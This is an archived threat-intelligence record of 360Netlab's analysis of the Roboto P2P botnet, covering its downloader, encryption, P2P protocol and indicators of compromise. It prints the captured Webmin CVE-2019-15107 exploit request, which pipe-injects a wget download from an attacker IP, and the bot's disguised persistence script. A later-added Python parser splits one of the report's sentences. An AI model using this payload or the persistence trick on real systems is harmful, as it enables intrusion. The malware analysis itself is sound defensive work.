{
	"id": "55837751-1acc-4946-8764-163c81f43c07",
	"created_at": "2026-04-06T00:19:54.77689Z",
	"updated_at": "2026-04-10T13:12:58.424256Z",
	"deleted_at": null,
	"sha1_hash": "18c77f7056f1f93147b76f51adf9d6c6a60949e1",
	"title": "The awaiting Roboto Botnet",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 2596593,
	"plain_text": "The awaiting Roboto Botnet\r\nBy Alex.Turing\r\nPublished: 2019-11-20 · Archived: 2026-04-05 23:10:44 UTC\r\nBackground introduction\r\nOn August 26, 2019, our 360Netlab Unknown Threat Detection System highlighted a suspicious ELF file\r\n(4cd7bcd0960a69500aa80f32762d72bc) and passed it along to our researchers for a closer look. Upon further\r\nanalysis, we determined that it is a P2P bot program.\r\nFast forward to October 11, 2019: our Anglerfish honeypot captured another suspicious ELF sample\r\n(4b98096736e94693e2dc5a1361e1a720), which turned out to be the Downloader of the previous suspicious ELF\r\nsample. The Downloader fetches the above Bot program from two hard-coded HTTP URLs. One of\r\nthe addresses disguised the Bot sample as a Google font library \"roboto.ttc\", so we named the Botnet Roboto.\r\nWe have been tracking the Roboto Botnet for nearly three months and here are some of its technical features.\r\nRoboto Botnet overview\r\nCurrently, we have captured the Downloader and Bot modules of the Roboto Botnet, and we speculate that it also\r\nhas a vulnerability scanning module and a P2P control module.\r\nRoboto Botnet mainly supports 7 functions: reverse shell, self-uninstall, gather network information of processes,\r\ngather Bot information, execute system commands, run encrypted files specified by URL, and DDoS attack.\r\nAt the same time, it uses Curve25519, Ed25519, TEA, SHA256, HMAC-SHA256 and other algorithms to\r\nensure the integrity and security of its components and P2P network, creates the corresponding Linux self-starting\r\nscript for the target system, and disguises its own file and process names to maintain persistence.\r\nhttps://blog.netlab.360.com/the-awaiting-roboto-botnet-en\r\nPage 1 of 20\n\nRoboto Botnet has DDoS functionality, but DDoS does not seem to be its main goal. We have yet to capture a single\r\nDDoS attack command since it showed up on our radar. 
We have yet to learn its true purpose.\r\nPropagation\r\nOn October 11th, 2019, the Anglerfish honeypot caught 51.38.200.230 spreading Downloader sample\r\n4b98096736e94693e2dc5a1361e1a720 via the Webmin RCE vulnerability (CVE-2019-15107). The download\r\nURL is http://190.114.240.194/boot; the following is the exploit payload.\r\nPOST /password_change.cgi HTTP/1.1\r\nHost: {target}:10000\r\nUser-Agent: Go-http-client/1.1\r\nAccept: */*\r\nReferer: https://{target}:10000/session_login.cgi\r\nCookie: redirect=1; testing=1; sid=x; sessiontest=1\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: 270\r\nuser=daemon\u0026pam=\u0026new1=x\u0026new2=x\u0026old=x%7Cwget%20190.114.240.194%2Fboot%20-O%20%2Ftmp%2F93b5b5e8%3Bchmod%20777%20%2\r\nThe old-password field carries a pipe-injected shell command; URL-decoded it reads\r\nx|wget 190.114.240.194/boot -O /tmp/93b5b5e8;chmod 777 ... (truncated as captured).\r\nWe can see that 51.38.200.230 itself also has the same Webmin service (TCP/10000) open; we suspect it was also\r\ninfected.\r\nReverse analysis\r\nRoboto Downloader sample analysis\r\nMD5: 4b98096736e94693e2dc5a1361e1a720\r\nELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, stripped\r\nLibrary: musl-libc\r\nThe main function of Roboto Downloader is to download the corresponding encrypted Roboto Bot program from\r\nthe specified URL according to the CPU architecture of the victim machine, and then decrypt and execute it.\r\nCurrently, Roboto Downloader supports both i386 and x86_64 architectures.\r\nThe URLs hard-coded in the Roboto Downloader sample point to the encrypted Roboto Bot program. Each group of URLs\r\nhas a corresponding decryption key and SHA256 check value.\r\nTake image2.jpg as an example. 
Its SHA256 hash value is consistent with the hard-coded SHA256 hash value in\r\nthe Roboto Downloader sample.\r\nThe decryption algorithm is as follows: the key length is 8 bytes, and each round derives a new XOR key.\r\nAfter decrypting, we got the Roboto Bot sample.\r\nThe initial XOR key is not known, but the characteristics of the XOR encryption algorithm can be used to recover the\r\nbot file.\r\nBecause elf_header[0x8:0xf] (the e_ident padding) is normally all zero, the ciphertext at that offset exposes the round\r\nkey, so the Bot file can be decrypted by the following method (the published snippet, completed with the declarations\r\nand I/O it needs so that it builds and runs as a stand-alone tool):\r\n#include \u003calgorithm\u003e\r\n#include \u003ccstdint\u003e\r\n#include \u003ccstring\u003e\r\n#include \u003cfstream\u003e\r\n#include \u003ciostream\u003e\r\n#include \u003citerator\u003e\r\n#include \u003cstring\u003e\r\nusing namespace std;\r\n// Decrypt a Roboto Bot image in place. The 8-byte round key is recovered from\r\n// ciphertext bytes 8..15, which encrypt the all-zero e_ident padding of the ELF\r\n// header. Returns false if the buffer is too short to hold an ELF header.\r\nbool decrypt_roboto_bot(string \u0026fstr)\r\n{\r\n    if (fstr.size() \u003c 64)\r\n        return false;\r\n    uint64_t fsize = fstr.size();\r\n    // Byte j of each block is XORed with key byte 7 - j, so the key bytes\r\n    // appear reversed in the stream; reverse them back to get the 64-bit key.\r\n    string skey(fstr, 8, 8);\r\n    reverse(skey.begin(), skey.end());\r\n    uint64_t sskey;\r\n    memcpy(\u0026sskey, skey.data(), sizeof sskey);\r\n    uint8_t *kb = (uint8_t*)\u0026sskey;   // byte view of the current round key\r\n    cout \u003c\u003c hex \u003c\u003c \"sskey= \" \u003c\u003c sskey \u003c\u003c endl;\r\n    // Bytes 0..7 are not recovered from the stream: restore the known ELF magic.\r\n    fstr[0] = '\\x7F';\r\n    fstr[1] = 'E';\r\n    fstr[2] = 'L';\r\n    fstr[3] = 'F';\r\n    fstr[6] = '\\x01';   // EI_VERSION\r\n    fstr[7] = '\\x00';   // EI_OSABI\r\n    fsize -= 8;\r\n    uint64_t cnt = fsize / 8;\r\n    uint8_t rmd = fsize % 8;\r\n    for (uint64_t i = 0; i \u003c cnt; i++) {\r\n        for (int j = 0; j \u003c 8; j++)\r\n            fstr[8 + i * 8 + j] ^= kb[7 - j];\r\n        // xorshift64 (shifts 13, 7, 17) steps to the next round key\r\n        uint64_t rnda = (sskey \u003c\u003c 13) ^ sskey;\r\n        uint64_t rndb = (rnda \u003e\u003e 7) ^ rnda;\r\n        uint64_t rndc = (rndb \u003c\u003c 17) ^ rndb;\r\n        sskey = rndc;\r\n    }\r\n    // Trailing partial block, handled as in the published snippet\r\n    for (uint8_t i = 0; i \u003c rmd; i++)\r\n        fstr[8 * cnt + 8 + i] ^= kb[rmd - i];\r\n    // EI_CLASS and EI_DATA are not recovered either; infer them from e_phentsize\r\n    // and e_shentsize, whose values are fixed for each ELF class and byte order.\r\n    if (fstr[42] == '\\x20' \u0026\u0026 fstr[46] == '\\x28')\r\n    {   // ELFCLASS32, ELFDATA2LSB\r\n        fstr[4] = '\\x01';\r\n        fstr[5] = '\\x01';\r\n    }\r\n    if (fstr[43] == '\\x20' \u0026\u0026 fstr[47] == '\\x28')\r\n    {   // ELFCLASS32, ELFDATA2MSB\r\n        fstr[4] = '\\x01';\r\n        fstr[5] = '\\x02';\r\n    }\r\n    if (fstr[54] == '\\x38' \u0026\u0026 fstr[58] == '\\x40')\r\n    {   // ELFCLASS64, ELFDATA2LSB\r\n        fstr[4] = '\\x02';\r\n        fstr[5] = '\\x01';\r\n    }\r\n    if (fstr[55] == '\\x38' \u0026\u0026 fstr[59] == '\\x40')\r\n    {   // ELFCLASS64, ELFDATA2MSB\r\n        fstr[4] = '\\x02';\r\n        fstr[5] = '\\x02';\r\n    }\r\n    return true;\r\n}\r\nint main(int argc, char **argv)\r\n{\r\n    if (argc != 3) {\r\n        cerr \u003c\u003c \"usage: \" \u003c\u003c argv[0] \u003c\u003c \" \u003cencrypted-bot\u003e \u003coutput-elf\u003e\" \u003c\u003c endl;\r\n        return 1;\r\n    }\r\n    ifstream file(argv[1], ios::binary | ios::in);\r\n    string fstr((istreambuf_iterator\u003cchar\u003e(file)), istreambuf_iterator\u003cchar\u003e());\r\n    file.close();\r\n    if (!decrypt_roboto_bot(fstr)) {\r\n        cerr \u003c\u003c \"input too short\" \u003c\u003c endl;\r\n        return 1;\r\n    }\r\n    ofstream out(argv[2], ios::binary);\r\n    out.write(fstr.data(), fstr.size());\r\n    return 0;\r\n}\r\nRoboto Bot sample analysis\r\nMD5: d88c737b46f1dcb981b4bb06a3caf4d7\r\nELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, stripped\r\nLibrary: musl-libc\r\nAs mentioned above, Roboto Bot has several built-in functions and disguises itself on the victim host.\r\nDisguise\r\nIt creates a self-starting script, /etc/init.d/dns-clear or systemd-hwdb-upgrade.service, depending on the\r\nrelease version of the Linux system.\r\n#! /bin/sh\r\n### BEGIN INIT INFO\r\n# Provides: dns-clear\r\n# Required-Start: $local_fs $remote_fs $network\r\n# Required-Stop: $local_fs\r\n# Default-Start: 1 2 3 4 5\r\n# Default-Stop:\r\n# Short-Description: Cleans up any mess left by 0dns-up\r\n### END INIT INFO\r\nPATH=/sbin:/bin:/usr/sbin:/usr/bin\r\ncase \"$1\" in\r\n start)\r\n /usr/lib/libXxf86dag.so.1.0.0 \u0026\r\n ;;\r\n *)\r\n ;;\r\nesac\r\nexit 0\r\nFake process names\r\n(sd-pam)\r\n/sbin/rpcbind\r\n/usr/bin/python\r\nupstart-socket-bridge\r\n/usr/sbin/irqbalance\r\n/lib/systemd/systemd-udevd\r\n/usr/libexec/postfix/master\r\nFile names used for masquerading\r\nlibXxf86dag.so\r\n.node_repl_history.gz\r\nHard-coded Peer information\r\nRoboto Bot hard-codes 4 sets of Peers; each entry has the structure IP:PORT:Curve25519_PubKey\r\nPeer 1:\r\n213.159.27.5:57491\r\nPubkey:\r\n8E A5 64 E2 A5 F7 73 6D 2E F2 86 D3 7B B7 86 E4\r\n7F 0D A7 A0 77 B1 AD 24 49 5B DE D6 DB B7 E1 79\r\nPeer 2:\r\n186.46.45.252:52085\r\nPubkey:\r\n93 DA 64 B3 1F 49 1B A4 B5 2D 28 92 49 52 7C 3D\r\n41 D2 4F B2 8B FF 2C ED A2 E7 90 18 4F 9E C0 7B\r\nPeer 3:\r\n95.216.17.209:57935\r\nPubkey:\r\nE8 78 31 C6 55 9A 13 FC AB DB 75 9B A5 B1 D6 05\r\nF2 3A 72 FF 04 B5 9F 7F 5A 8B 12 56 F2 CA 01 
5E\r\nPeer 4:\r\n120.150.43.45:49252\r\nPubkey:\r\nE7 30 7D 3C BC 93 4A EC ED D8 FD 9F B9 FE 93 B7\r\nF3 53 B3 11 5D F7 C8 CA 0C F8 77 D1 34 CA 37 20\r\nIn the sample 4cd7bcd0960a69500aa80f32762d72bc the third peer is different:\r\nPeer 3:\r\n66.113.179.13:33543\r\nPubkey:\r\nB3 E5 B3 D6 E6 DE 7C 7D 79 40 A5 4F D9 B0 AC 7B\r\n2D C6 CE 69 EF F3 C4 58 F2 98 A8 92 DF 92 9E 0E\r\nEncryption verification\r\nRoboto Bot uses Curve25519, TEA and HMAC-SHA256 to implement data encryption and\r\nvalidity verification. The same scheme is used both for the cfg file and for P2P data packets.\r\nThe general process is as shown.\r\nThe Curve25519 private key is generated from /dev/urandom.\r\ncfg file\r\nRoboto Bot stores the generated cfg file in a different location depending on the privilege it runs with.\r\n$home/.config/trolltech.conf //run as regular user\r\n/etc/iproute2/rt_ksfield //run as root\r\nThe cfg file contains the private key, the encrypted data, and the HMAC-SHA256 value of the encrypted data,\r\nand is updated every hour. The encrypted data consists of Peer and Port information, with the structure\r\npeer:length:data,pcfg:length:data.\r\nCfg file decryption example\r\nThe first 0x20 bytes, the Curve25519 private key:\r\n 68 F4 83 18 2C F2 80 3D D1 B3 FF 68 FB 35 3D E8\r\n E6 C8 DB 0B 8E FC 73 7C 01 B3 6F 3F 1C 89 38 63\r\nThe last 0x20 bytes, the HMAC-SHA256 hash over bytes 0x20-0x165:\r\n 1B 64 C4 FD 65 C0 95 9B 6F B1 D7 C1 75 31 DA 5A\r\n 01 EC E1 52 06 25 E9 7D A1 9B 57 E5 CA 67 2B D6\r\nEncryption verification\r\n1. 
Generate the public key from the private key:\r\n 52 25 27 87 F2 B2 F7 35 32 1F ED A7 6A 29 03 A8\r\n 3F A4 51 58 EF 53 F5 6F 28 99 01 8E 62 2C 4A 24\r\n2. Take the last 16 bytes of the public key, reverse the byte order of each DWORD, and use the result as the TEA key:\r\n 58 51 A4 3F 6F F5 53 EF 8E 01 99 28 24 4A 2C 62\r\n3. Use the above key to derive the XOR key:\r\n First round: ED 16 FB 00 46 4F 94 99\r\n4. XOR decryption; repeat step 3 for every 8-byte block to update the XOR key:\r\n Ciphertext: 9D 73 9E 72 76 4E DE 99\r\n Plaintext: peer\\x30\\x01\\x4a\\x00\r\nThe record header is a 4-byte ASCII tag followed by a 2-byte little-endian length (0x0130), so we know that the\r\npeer record carries 0x130 bytes of data, and so on: the plaintext of the ciphertext (8E 3C 1F 93 B1 C9) is (pcfg\\x04\\x00).\r\nP2P control module\r\nRoboto Bot can be controlled through a Unix domain socket bound to the path /tmp/.cs.\r\nThe following code starts the control process.\r\nWe did not find the code that sets the environment variable \"CS\" in the Roboto Bot sample, so we\r\nspeculate that it lives in the Roboto P2P control module: it starts a process, sets the environment variable \"CS\", and\r\ncontrols the Roboto Bot module through the Unix domain socket; that P2P node then becomes a control node in the\r\nBotnet P2P network.\r\nWe can get a good idea of the functions of the P2P control module from the Roboto Bot module; the function\r\nnames are very intuitive.\r\nWe tested some of the control commands by hijacking the Roboto Bot program. 
Here are some test results.\r\ninfo: the command displays hard-coded information and the public key, including the string v17, which we\r\nsuspect is a program version number.\r\npeers: the command displays the P2P nodes that Roboto Bot is currently connected to.\r\nBot function\r\n/proc/%s/exe\r\n/proc/%s/cmdline\r\n/proc/net/tcp\r\n/proc/net/udp\r\ncrontab\r\nGet the Bot information and upload it to the specified HTTP interface.\r\nRun the encrypted file at the specified URL (similar to the Roboto Downloader function).\r\nThe DDoS attack\r\nDepending on the privilege it runs with, Bot provides four DDoS attack methods: ICMP Flood, HTTP\r\nFlood, TCP Flood, and UDP Flood.\r\nP2P communication protocol\r\nOn top of its P2P communication protocol, Roboto Bot employs Curve25519, TEA and\r\nHMAC-SHA256 to ensure data integrity and confidentiality. The encryption key is derived from the\r\nCurve25519 SharedKey computed from the Bot's key pair and the peer's public key. The format of a packet is\r\nindex(4 bytes):type(1 byte):data:hmac-sha256[0:0xf] (the first 16 bytes of the HMAC-SHA256), so only packets\r\nlonger than 21 bytes carry data.\r\nP2P node discovery data verification\r\nThe request packet has a fixed length of 69 bytes, its data is not encrypted, and it contains the public key of\r\nthe target Peer and the public key of the Bot. 
After receiving the Bot's request packet, the Peer establishes a connection\r\nwith the Bot if the target public key matches its own, and then calculates the SharedKey from the Bot's public key.\r\nIn the subsequent communication, messages carrying data (longer than 21 bytes) are encrypted.\r\nP2P node discovery data decryption\r\nAs an example, the local Roboto Bot sample communicates with the hard-coded Peer (186.46.45.252) and learns a\r\nnew Peer node, 87.249.15.18:63104.\r\nBot request, 69 bytes\r\nindex: 00 00 00 00\r\ntype: 2\r\ndata:\r\n 0-31: C2 Curve25519_PublicKey\r\n93 DA 64 B3 1F 49 1B A4 B5 2D 28 92 49 52 7C 3D\r\n41 D2 4F B2 8B FF 2C ED A2 E7 90 18 4F 9E C0 7B\r\n32-63: Bot Curve25519_PublicKey\r\n52 25 27 87 F2 B2 F7 35 32 1F ED A7 6A 29 03 A8\r\n3F A4 51 58 EF 53 F5 6F 28 99 01 8E 62 2C 4A 24\r\nPeer reply, 60 bytes\r\nindex: 00 00 00 00\r\ntype: 00\r\ndata:\r\ncmdtype:\r\n4f\r\nip:port\r\n44 be 1c 18 da 42\r\nPublicKey:\r\n7e 42 89 b6 36 5f 73 10 88 ea 60 36 b9 ca 89 25\r\n3e 3e e3 2f 7e b6 d6 08 9e 96 89 25 68 a0 9f 7f\r\nHmac-sha256[0:0xf]\r\nb5 1a d7 0d d4 63 83 0e de 06 34 ad 36 cc 83 4e\r\nDecryption verification process\r\n1. Derive the shared key from the Bot's private key and the Peer's public key:\r\nSharedKey:\r\n 28 EC 2D A8 63 F3 2D 39 8F 1C 03 96 32 AE F2 D8\r\n B8 D1 9E 6C ED BD AC 2C BE D6 CF 60 83 C9 D6 1D\r\n2. Use the first 16 bytes of the HMAC-SHA256 for verification:\r\nHMAC-SHA256[0:0xf]=\r\nb5 1a d7 0d d4 63 83 0e de 06 34 ad 36 cc 83 4e\r\n3. Take the first 16 bytes of the SharedKey as listed above, reverse the byte order of each DWORD, and use the result\r\nas the TEA key (the value below is the first four DWORDs of the SharedKey, byte-reversed):\r\nA8 2D EC 28 39 2D F3 63 96 03 1C 8F D8 F2 AE 32\r\n4. 
Use the above key to derive the XOR key:\r\nFirst round: 4E 13 47 13 0A 2C C2 6A\r\nSecond round: B0 68 BD EB 9B 29 10 23\r\nThird round: AD B4 3D 34 40 C0 3D FC\r\nFourth round: 31 1E 6B F0 EA D5 8E 65\r\nFifth round: D1 1C 42 58 2A 0C 7D A4\r\n5. XOR decryption; repeat step 4 for every 8-byte block to update the XOR key and recover the plaintext (the\r\nfive rounds above cover the 39-byte data field: four full blocks plus a 7-byte tail):\r\n cmdtype:\r\n 01\r\n ip:port:\r\n 57 F9 0F 12 : F6 80 (87.249.15.18:63104)\r\n PublicKey:\r\n 14 F2 E1 0B DD C4 5A 00 AB 47 D4 0B 8D 8A 49 18\r\n C2 0F FD 44 8E 5C 03 86 FB 47 95 67 30 8A 93 02\r\nFrom the following network packets, we can see that 87.249.15.18:63104 is exactly what we calculated.\r\nAttack command verification\r\nIn a P2P network, nodes are untrustworthy, and anyone can forge a P2P node at very low cost. In order to ensure\r\nthat the Roboto network stays fully under its operators' control and cannot be hijacked by others, Roboto performs\r\nsignature verification on each attack command. Only attack messages that carry a valid signature are accepted and\r\nexecuted by a Roboto node.\r\nRoboto uses Ed25519, a public-key digital signature algorithm, for this verification. 
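The node-discovery exchange above, and the cfg record header from the cfg file decryption example, carried out in code. This is an added example written for this page, not code from the original post or from the Roboto samples. The request, reply, shared-key-derived keystream rounds and cfg bytes are the captured values the post lists; the TEA round function that produces the keystream is not described in the post, so the rounds are taken as given input rather than recomputed. Two things the post leaves unstated are assumptions here: the packet index is read as little-endian, and the 16-byte trailer is taken to be HMAC-SHA256 keyed with the shared key over everything before the tag, so the tag check is only exercised on a packet the example constructs with a constructed key.

```python
import hashlib
import hmac
import struct

# Roboto P2P packet layout as described in the post:
#   index (4 bytes) | type (1 byte) | data | HMAC-SHA256 truncated to 16 bytes
HDR_LEN = 5
TAG_LEN = 16
OVERHEAD = HDR_LEN + TAG_LEN          # 21 bytes; only longer packets carry data
PEER_RECORD_LEN = 1 + 4 + 2 + 32      # cmdtype | IPv4 | port | Curve25519 pubkey

# Discovery request (69 bytes) and reply (60 bytes) as captured in the post
# between the bot and the hard-coded peer 186.46.45.252.
REQUEST = bytes.fromhex(
    '00000000' '02'
    '93da64b31f491ba4b52d289249527c3d41d24fb28bff2ceda2e790184f9ec07b'   # peer pubkey
    '52252787f2b2f735321feda76a2903a83fa45158ef53f56f2899018e622c4a24')  # bot pubkey
REPLY = bytes.fromhex(
    '00000000' '00'
    '4f' '44be1c18da42'                                                   # cmdtype, ip:port (encrypted)
    '7e4289b6365f731088ea6036b9ca89253e3ee32f7eb6d6089e96892568a09f7f'   # pubkey (encrypted)
    'b51ad70dd463830ede0634ad36cc834e')                                   # HMAC-SHA256[0:16]

# XOR keystream rounds for this reply, taken verbatim from the post (the TEA
# round function that derives them from the shared key is not spelled out there).
REPLY_ROUNDS = [bytes.fromhex(h) for h in (
    '4e1347130a2cc26a', 'b068bdeb9b291023', 'adb43d3440c03dfc',
    '311e6bf0ead58e65', 'd11c42582a0c7da4')]

# First keystream round and first 8 ciphertext bytes of the cfg body, from the
# cfg file decryption example.
CFG_ROUND_1 = bytes.fromhex('ed16fb00464f9499')
CFG_CT_HEAD = bytes.fromhex('9d739e72764ede99')


def xor_keystream(buf, rounds):
    '''XOR buf with consecutive 8-byte rounds; a short tail uses the leading bytes of the next round.'''
    out = bytearray(buf)
    for i in range(len(out)):
        out[i] ^= rounds[i // 8][i % 8]
    return bytes(out)


def split_packet(pkt):
    '''Split index | type | data | tag. Index byte order is an assumption (little-endian).'''
    if len(pkt) <= OVERHEAD:
        raise ValueError('packet of %d bytes carries no data' % len(pkt))
    index, ptype = struct.unpack('<IB', pkt[:HDR_LEN])
    return {'index': index, 'type': ptype,
            'data': pkt[HDR_LEN:-TAG_LEN], 'tag': pkt[-TAG_LEN:]}


def parse_request(pkt):
    '''Discovery request: fixed 69 bytes, unencrypted and untagged: target pubkey | bot pubkey.'''
    if len(pkt) != HDR_LEN + 64:
        raise ValueError('discovery request must be 69 bytes, got %d' % len(pkt))
    index, ptype = struct.unpack('<IB', pkt[:HDR_LEN])
    return {'index': index, 'type': ptype,
            'peer_pubkey': pkt[HDR_LEN:HDR_LEN + 32],
            'bot_pubkey': pkt[HDR_LEN + 32:HDR_LEN + 64]}


def parse_peer_record(pt):
    '''cmdtype (1) | IPv4 (4) | port (2, big-endian) | Curve25519 pubkey (32).'''
    if len(pt) != PEER_RECORD_LEN:
        raise ValueError('unexpected peer record length %d' % len(pt))
    return {'cmdtype': pt[0],
            'ip': '.'.join(str(b) for b in pt[1:5]),
            'port': struct.unpack('>H', pt[5:7])[0],
            'pubkey': pt[7:]}


def decrypt_reply(pkt, rounds):
    '''Strip the framing, undo the XOR keystream and decode the peer record.'''
    fields = split_packet(pkt)
    rec = parse_peer_record(xor_keystream(fields['data'], rounds))
    rec['tag'] = fields['tag']
    return rec


def parse_cfg_record_header(ct8, round1):
    '''cfg body records: 4-byte ASCII tag, 2-byte little-endian length, then data.'''
    pt = xor_keystream(ct8, [round1])
    length = struct.unpack('<H', pt[4:6])[0]
    return pt[:4].decode('ascii'), length, pt[6:]


def build_packet(key, index, ptype, data):
    '''Frame data and append HMAC-SHA256(key, index|type|data)[:16].
    Keying and coverage are assumptions; the post only says the first 16 bytes are checked.'''
    body = struct.pack('<IB', index, ptype) + data
    return body + hmac.new(key, body, hashlib.sha256).digest()[:TAG_LEN]


def tag_matches(key, pkt):
    '''Recompute the truncated tag under the same assumption and compare in constant time.'''
    expected = hmac.new(key, pkt[:-TAG_LEN], hashlib.sha256).digest()[:TAG_LEN]
    return hmac.compare_digest(expected, pkt[-TAG_LEN:])


if __name__ == '__main__':
    req = parse_request(REQUEST)
    print('request type %d to peer %s' % (req['type'], req['peer_pubkey'].hex()))
    rec = decrypt_reply(REPLY, REPLY_ROUNDS)
    print('reply cmdtype %d: new peer %s:%d pubkey %s'
          % (rec['cmdtype'], rec['ip'], rec['port'], rec['pubkey'].hex()))
    tag, length, head = parse_cfg_record_header(CFG_CT_HEAD, CFG_ROUND_1)
    print('cfg record %s length 0x%x, data starts %s' % (tag, length, head.hex()))
    # Tag check on a constructed packet under a constructed key (not the real shared key).
    demo_key = bytes(range(32))
    demo = build_packet(demo_key, 1, 0, bytes(PEER_RECORD_LEN))
    tampered = demo[:-1] + bytes([demo[-1] ^ 1])
    print('demo tag ok: %s, tampered: %s' % (tag_matches(demo_key, demo), tag_matches(demo_key, tampered)))
```

Running the block recovers 87.249.15.18:63104 and the public key 14 F2 E1 0B ... 8A 93 02, the same values the post works out by hand. xor_keystream applies round k to bytes 8k..8k+7 of the data field and lets the 7-byte tail take the first 7 bytes of the fifth round; that is the only reading consistent with the published plaintext, and it matches the 4f ^ 4E = 01 cmdtype byte at the very start. The decrypted cfg header shows the record shape the post describes, a 4-byte tag followed by a 2-byte little-endian length of 0x130. The 21-byte framing check matters in practice: a packet of exactly 21 bytes has an empty data field, so a parser that slices data before checking the length will silently produce an empty record.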
The verification public key is\r\n60FF4A4203433AA2333A008C1B305CD80846834B9BE4BBA274F873831F04DF1C, and it is embedded in each\r\nRoboto Bot sample.\r\nSuggestions\r\nWe recommend that Webmin users check whether they are infected by looking at the processes, file names and\r\nUDP network connections covered above.\r\nWe recommend that the IPs, URLs and domain names related to the Roboto Botnet be monitored and blocked.\r\nContact us\r\nReaders are always welcome to reach us on Twitter, WeChat (360Netlab) or by email to netlab at 360 dot cn.\r\nIoC list\r\nSample MD5\r\n4b98096736e94693e2dc5a1361e1a720\r\n4cd7bcd0960a69500aa80f32762d72bc\r\nd88c737b46f1dcb981b4bb06a3caf4d7\r\nEncrypted Roboto Bot MD5\r\nimage.jpg de14c4345354720effd0710c099068e7\r\nimage2.jpg 69e1cccaa072aedc6a9fd9739e2cdf90\r\nroboto.ttc f47593cceec08751edbc0e9c56cad6ee\r\nroboto.ttf 3020c2a8351c35530ab698e298a5735c\r\nURL\r\nhttp://190.114.240.194/boot\r\nhttp://citilink.dev6.ru/css/roboto.ttc\r\nhttp://citilink.dev6.ru/css/roboto.ttf\r\nhttp://144.76.139.83:80/community/uploadxx/1461C493-38BF-4E72-B118-BE35839A8914/image.jpg\r\nhttp://144.76.139.83:80/community/uploadxx/1461C493-38BF-4E72-B118-BE35839A8914/image2.jpg\r\nHard-coded Peer IP\r\n95.216.17.209 Finland ASN 24940 Hetzner Online GmbH\r\n213.159.27.5 Italy ASN 201474 Aircom Service srl\r\n186.46.45.252 Ecuador ASN 28006 CORPORACION NACIONAL DE TELECOMU\r\n120.150.43.45 Australia ASN 1221 Telstra Corporation Ltd\r\n66.113.179.13 United States ASN 14280 NetNation Communications Inc\r\nSource: https://blog.netlab.360.com/the-awaiting-roboto-botnet-en",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://blog.netlab.360.com/the-awaiting-roboto-botnet-en"
	],
	"report_names": [
		"the-awaiting-roboto-botnet-en"
	],
	"threat_actors": [],
	"ts_created_at": 1775434794,
	"ts_updated_at": 1775826778,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/18c77f7056f1f93147b76f51adf9d6c6a60949e1.pdf",
		"text": "https://archive.orkl.eu/18c77f7056f1f93147b76f51adf9d6c6a60949e1.txt",
		"img": "https://archive.orkl.eu/18c77f7056f1f93147b76f51adf9d6c6a60949e1.jpg"
	}
}